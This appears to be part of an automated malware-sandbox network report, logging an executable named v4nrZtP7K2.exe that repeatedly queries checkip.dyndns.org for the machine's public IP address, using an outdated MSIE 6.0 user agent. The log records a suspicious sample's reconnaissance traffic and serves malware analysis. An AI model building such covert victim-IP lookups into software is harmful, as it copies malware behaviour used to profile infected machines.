                                                                                    Jan 10, 2025 21:41:10.627417088 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 10, 2025 21:41:17.038228035 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 10, 2025 21:41:17.319858074 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.949750132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:18.720920086 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 10, 2025 21:41:19.564111948 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.949763132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:20.560574055 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:21.444427967 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.949775132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:22.423968077 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:23.232569933 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:23 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.949792132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:24.253156900 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:25.113312006 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.949804132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:26.318744898 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:27.155415058 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.949820132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:28.126822948 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:28.982959032 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.949833132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:29.916517019 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:30.747426033 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.949846132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:31.782521009 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:32.627525091 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.949860132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:33.631115913 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:34.435841084 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.949871132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:35.486218929 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:36.386353970 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.949884132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:37.273180008 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:38.117928982 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.949898132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:39.048686981 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:39.889874935 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:39 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.949912132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:40.946892023 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:41.827558994 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:41 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.949925132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:42.804886103 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:43.640191078 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:43 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.949937132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:44.724029064 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:45.908823967 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:45 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.949952132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:47.656416893 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:48.755964994 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:48 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.949968132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:49.657025099 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:50.470134974 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:50 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.949981132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:51.540098906 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:52.380743027 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.949995132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:53.386478901 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 10, 2025 21:41:54.219739914 CET273INHTTP/1.1 200 OK
                                                                                    Date: Fri, 10 Jan 2025 20:41:54 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.950008132.226.8.169804256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 10, 2025 21:41:55.164277077 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
